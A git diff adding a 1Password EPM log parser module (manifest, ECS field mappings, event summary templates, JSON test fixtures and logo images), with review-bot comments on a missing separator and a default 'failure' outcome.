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 literal 0 HcmV?d00001 diff --git a/1Password/1password-epm/_meta/manifest.yml b/1Password/1password-epm/_meta/manifest.yml new file mode 100644 index 000000000..decfb3ddd --- /dev/null +++ b/1Password/1password-epm/_meta/manifest.yml @@ -0,0 +1,11 @@ +uuid: 09754cc4-e247-4712-9a76-25529ba11b8b +name: 1Password EPM +slug: 1password-epm +automation_connector_uuid: f3330ea4-e492-4c57-9764-d2dcf1d044eb +automation_module_uuid: 56f9e1f6-95ba-45ed-867b-44fb3183934d + +description: >- + 1Password's Enterprise Password Manager offers robust security features for businesses, enabling secure sharing and management of passwords and sensitive data across teams, with advanced admin controls and seamless integration into existing workflows. + +data_sources: + Authentication logs: diff --git a/1Password/1password-epm/_meta/smart-descriptions.json b/1Password/1password-epm/_meta/smart-descriptions.json new file mode 100644 index 000000000..d3d36ac61 --- /dev/null +++ b/1Password/1password-epm/_meta/smart-descriptions.json 
@@ -0,0 +1,29 @@
+[
+ {
+ "value": "Sign in attempts from {client.ip} for user {user.target.name}({user.target.email}) with status {event.outcome}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "signinattempts"
+ }
+ ]
+ },
+ {
+ "value": "Item usages: {user.name}({user.email}) from {client.ip}: {event.action}{1password.object.type} with status {event.outcome}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "itemusages"
+ }
+ ]
+ },
+ {
+ "value": "Audit event from {user.name}({user.email}) on {client.ip}: {event.action}{1password.object.type} with status {event.outcome}",
+ "conditions": [
+ {
+ "field": "event.dataset",
+ "value": "auditevents"
+ }
+ ]
+ }
+]
diff --git a/1Password/1password-epm/ingest/parser.yml b/1Password/1password-epm/ingest/parser.yml
new file mode 100644
index 000000000..168ecfc93
--- /dev/null
+++ b/1Password/1password-epm/ingest/parser.yml
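Review bot: The item-usage and audit-event templates concatenate `{event.action}{1password.object.type}` with no separator, so the audit sample in test_audit_events.json (`action: join`, `object_type: gm`) renders as `joingm`. Adding a space or preposition between the two placeholders, e.g. `{event.action} {1password.object.type}`, keeps the summary readable in both entries.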
@@ -0,0 +1,105 @@
+name: 1password-epm
+ignored_values: [""]
+pipeline:
+ - name: parse_event
+ external:
+ name: json.parse-json
+ properties:
+ input_field: "{{original.message}}"
+ output_field: message
+
+ - name: set_ecs_fields
+
+stages:
+ set_ecs_fields:
+ actions:
+ - set:
+ observer.vendor: "Agilebits"
+ observer.product: "1Password EPM"
+ event.outcome: "failure"
+
+ - set:
+ event.outcome: "success"
+ filter: "{{parse_event.message.category == 'success'}}"
+
+ - set:
+ event.category: ["authentication"]
+ event.type: ["start"]
+ filter: "{{parse_event.message.sekoia_event_type == 'signinattempts'}}"
+
+ - set:
+ event.category: ["session"]
+ event.type: ["info"]
+ filter: "{{parse_event.message.sekoia_event_type == 'itemusages'}}"
+
+ - set:
+ event.category: ["configuration"]
+ event.type: ["change"]
+ filter: "{{parse_event.message.sekoia_event_type == 'auditevents'}}"
+
+ - set:
+ "@timestamp": "{{parse_event.message.timestamp | to_rfc3339}}"
+ event.action: "{{parse_event.message.action}}"
+ event.dataset: "{{parse_event.message.sekoia_event_type}}"
+
+ - set:
+ user.id: "{{parse_event.message.actor_details.uuid}}"
+ user.email: "{{parse_event.message.actor_details.email}}"
+ user.name: "{{parse_event.message.actor_details.name}}"
+ filter: "{{parse_event.message.actor_details != null}}"
+
+ - set:
+ user.id: "{{parse_event.message.user.uuid}}"
+ user.email: "{{parse_event.message.user.email}}"
+ user.name: "{{parse_event.message.user.name}}"
+ filter: "{{parse_event.message.user != null}}"
+
+ - set:
+ user.target.id: "{{parse_event.message.aux_details.uuid}}"
+ user.target.name: "{{parse_event.message.aux_details.name}}"
+ user.target.email: "{{parse_event.message.aux_details.email}}"
+ filter: "{{parse_event.message.aux_details != null}}"
+
+ - set:
+ user.target.id: "{{parse_event.message.target_user.uuid}}"
+ user.target.name: "{{parse_event.message.target_user.name}}"
+ user.target.email: "{{parse_event.message.target_user.email}}"
+ filter: "{{parse_event.message.target_user != null}}"
+
+ - set:
+ 1password.session_uuid: "{{parse_event.message.session_uuid}}"
+ filter: ""
+
+ - set:
+ 1password.session_uuid: "{{parse_event.message.session.uuid}}"
+ filter: "{{parse_event.message.session != null}}"
+
+ - set:
+ host.id: "{{parse_event.message.session.device_uuid}}"
+
+ client.geo.country_name: "{{parse_event.message.location.country}}"
+ client.geo.region_name: "{{parse_event.message.location.region}}"
+ client.geo.city_name: "{{parse_event.message.location.city}}"
+ client.geo.location.lat: "{{parse_event.message.location.latitude}}"
+ client.geo.location.lon: "{{parse_event.message.location.longitude}}"
+ 1password.object.uuid: "{{parse_event.message.object_uuid}}"
+
+ 1password.object.name: "{{parse_event.message.object_details.name}}"
+ 1password.object.email: "{{parse_event.message.object_details.email}}"
+ 1password.object.type: "{{parse_event.message.object_type}}"
+ host.os.name: "{{parse_event.message.client.os_name}}"
+ host.os.version: "{{parse_event.message.client.os_version}}"
+
+ 1password.vault_uuid: "{{parse_event.message.vault_uuid}}"
+ 1password.item_uuid: "{{parse_event.message.item_uuid}}"
+
+ 1password.category: "{{parse_event.message.category}}"
+ 1password.type: "{{parse_event.message.type}}"
+
+ - set:
+ client.ip: "{{parse_event.message.session.ip}}"
+ filter: "{{parse_event.message.session.ip | is_ipaddress}}"
+
+ - set:
+ client.ip: "{{parse_event.message.client.ip_address}}"
+ filter: "{{parse_event.message.client.ip_address | is_ipaddress}}"
diff --git a/1Password/1password-epm/tests/test_audit_events.json b/1Password/1password-epm/tests/test_audit_events.json
new file mode 100644
index 000000000..02050a1e6
--- /dev/null
+++ b/1Password/1password-epm/tests/test_audit_events.json
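Review bot: `event.outcome` is set to "failure" unconditionally in the first `set` action and only switched to "success" when `parse_event.message.category == 'success'`, yet `category` is only carried by sign-in attempt events, so every item-usage and audit event is emitted as a failure (test_audit_events.json and test_item_usage_events.json expect `"outcome": "failure"` for a `join` and a `secure-copy`). Detection rules keyed on `event.outcome` would then treat routine activity as failed operations. Scoping the default to the dataset that actually reports a result, `event.outcome: "failure"` with `filter: "{{parse_event.message.sekoia_event_type == 'signinattempts'}}"`, and leaving the other datasets without an outcome avoids the mislabel. Separately, the first `1password.session_uuid` action carries `filter: ""`; the sign-in test expects that value to be populated, so the empty filter is presumably treated as no filter, and dropping the line makes that intent explicit.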
@@ -0,0 +1,65 @@ +{ + "input": { + "message": "{\"sekoia_event_type\": \"auditevents\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"actor_uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"actor_details\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"Jane Doe\", \"email\": \"jane.doe@example.com\"}, \"action\": \"join\", \"object_type\": \"gm\", \"object_uuid\": \"pf8soyakgngrphytsyjed4ae3u\", \"aux_id\": 9277034, \"aux_uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"aux_details\": {\"uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"aux_info\": \"R\", \"session\": {\"uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"login_time\": \"2023-03-15T16:33:50-03:00\", \"device_uuid\": \"lc5fqgbrcm4plajd8mwncv2b3u\", \"ip\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}" + }, + "expected": { + "message": "{\"sekoia_event_type\": \"auditevents\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"actor_uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"actor_details\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"Jane Doe\", \"email\": \"jane.doe@example.com\"}, \"action\": \"join\", \"object_type\": \"gm\", \"object_uuid\": \"pf8soyakgngrphytsyjed4ae3u\", \"aux_id\": 9277034, \"aux_uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"aux_details\": {\"uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"aux_info\": \"R\", \"session\": {\"uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"login_time\": \"2023-03-15T16:33:50-03:00\", \"device_uuid\": \"lc5fqgbrcm4plajd8mwncv2b3u\", \"ip\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}", + "event": { + "action": "join", + "category": [ + "configuration" + ], + 
"dataset": "auditevents", + "outcome": "failure", + "type": [ + "change" + ] + }, + "1password": { + "object": { + "type": "gm", + "uuid": "pf8soyakgngrphytsyjed4ae3u" + }, + "session_uuid": "A5K6COGVRVEJXJW3XQZGS7VAMM" + }, + "@timestamp": "2023-03-15T19:33:50Z", + "client": { + "address": "1.2.3.4", + "geo": { + "city_name": "Toronto", + "country_name": "Canada", + "location": { + "lat": 43.5991, + "lon": -79.4988 + }, + "region_name": "Ontario" + }, + "ip": "1.2.3.4" + }, + "host": { + "id": "lc5fqgbrcm4plajd8mwncv2b3u" + }, + "observer": { + "product": "1Password EPM", + "vendor": "Agilebits" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "Jane Doe" + ] + }, + "user": { + "email": "jane.doe@example.com", + "id": "4HCGRGYCTRQFBMGVEGTABYDU2V", + "name": "Jane Doe", + "target": { + "email": "john.doe@example.com", + "id": "K6VFYDCJKHGGDI7QFAXX65LCDY", + "name": "John Doe" + } + } + } +} \ No newline at end of file diff --git a/1Password/1password-epm/tests/test_item_usage_events.json b/1Password/1password-epm/tests/test_item_usage_events.json new file mode 100644 index 000000000..17104ecd9 --- /dev/null +++ b/1Password/1password-epm/tests/test_item_usage_events.json 
@@ -0,0 +1,60 @@ +{ + "input": { + "message": "{\"sekoia_event_type\": \"itemusages\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"used_version\": 0, \"vault_uuid\": \"VZSYVT2LGHTBWBQGUJAIZVRABM\", \"item_uuid\": \"SDGD3I4AJYO6RMHRK8DYVNFIDZ\", \"user\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}, \"action\": \"secure-copy\"}" + }, + "expected": { + "message": "{\"sekoia_event_type\": \"itemusages\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"used_version\": 0, \"vault_uuid\": \"VZSYVT2LGHTBWBQGUJAIZVRABM\", \"item_uuid\": \"SDGD3I4AJYO6RMHRK8DYVNFIDZ\", \"user\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}, \"action\": \"secure-copy\"}", + "event": { + "action": "secure-copy", + "category": [ + "session" + ], + "dataset": "itemusages", + "outcome": "failure", + "type": [ + "info" + ] + }, + "1password": { + "item_uuid": "SDGD3I4AJYO6RMHRK8DYVNFIDZ", + "vault_uuid": "VZSYVT2LGHTBWBQGUJAIZVRABM" + }, + "@timestamp": "2023-03-15T19:33:50Z", + "client": { + "address": "1.2.3.4", + "geo": { + "city_name": "Toronto", + "country_name": "Canada", + 
"location": { + "lat": 43.5991, + "lon": -79.4988 + }, + "region_name": "Ontario" + }, + "ip": "1.2.3.4" + }, + "host": { + "os": { + "name": "MacOSX", + "version": "13.2" + } + }, + "observer": { + "product": "1Password EPM", + "vendor": "Agilebits" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "John Doe" + ] + }, + "user": { + "email": "john.doe@example.com", + "id": "4HCGRGYCTRQFBMGVEGTABYDU2V", + "name": "John Doe" + } + } +} \ No newline at end of file diff --git a/1Password/1password-epm/tests/test_sign_in_attempts.json b/1Password/1password-epm/tests/test_sign_in_attempts.json new file mode 100644 index 000000000..18313edeb --- /dev/null +++ b/1Password/1password-epm/tests/test_sign_in_attempts.json 
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"sekoia_event_type\": \"signinattempts\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"session_uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"timestamp\": \"2023-03-15T16:32:50-03:00\", \"category\": \"firewall_failed\", \"type\": \"continent_blocked\", \"country\": \"France\", \"details\": {\"value\": \"Europe\"}, \"target_user\": {\"uuid\": \"IR7VJHJ36JHINBFAD7V2T5MP3E\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}" + }, + "expected": { + "message": "{\"sekoia_event_type\": \"signinattempts\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"session_uuid\": \"A5K6COGVRVEJXJW3XQZGS7VAMM\", \"timestamp\": \"2023-03-15T16:32:50-03:00\", \"category\": \"firewall_failed\", \"type\": \"continent_blocked\", \"country\": \"France\", \"details\": {\"value\": \"Europe\"}, \"target_user\": {\"uuid\": \"IR7VJHJ36JHINBFAD7V2T5MP3E\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"client\": {\"app_name\": \"1Password Browser\", \"app_version\": \"20240\", \"platform_name\": \"Chrome\", \"platform_version\": \"string\", \"os_name\": \"MacOSX\", \"os_version\": \"13.2\", \"ip_address\": \"1.2.3.4\"}, \"location\": {\"country\": \"Canada\", \"region\": \"Ontario\", \"city\": \"Toronto\", \"latitude\": 43.5991, \"longitude\": -79.4988}}", + "event": { + "category": [ + "authentication" + ], + "dataset": "signinattempts", + "outcome": "failure", + "type": [ + "start" + ] + }, + "1password": { + "category": "firewall_failed", + "session_uuid": "A5K6COGVRVEJXJW3XQZGS7VAMM", + "type": "continent_blocked" + }, + "@timestamp": "2023-03-15T19:32:50Z", + 
"client": { + "address": "1.2.3.4", + "geo": { + "city_name": "Toronto", + "country_name": "Canada", + "location": { + "lat": 43.5991, + "lon": -79.4988 + }, + "region_name": "Ontario" + }, + "ip": "1.2.3.4" + }, + "host": { + "os": { + "name": "MacOSX", + "version": "13.2" + } + }, + "observer": { + "product": "1Password EPM", + "vendor": "Agilebits" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "user": { + "target": { + "email": "john.doe@example.com", + "id": "IR7VJHJ36JHINBFAD7V2T5MP3E", + "name": "John Doe" + } + } + } +} \ No newline at end of file diff --git a/1Password/README.md b/1Password/README.md new file mode 100644 index 000000000..fe3c4f805 --- /dev/null +++ b/1Password/README.md @@ -0,0 +1,7 @@ +# 1Password + +## Description +The description of the module + +## Intakes +* 
diff --git a/1Password/_meta/logo.png b/1Password/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..d8fbd396e5dd798f4530be439b902acae10c5f19 GIT binary patch literal 11824 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 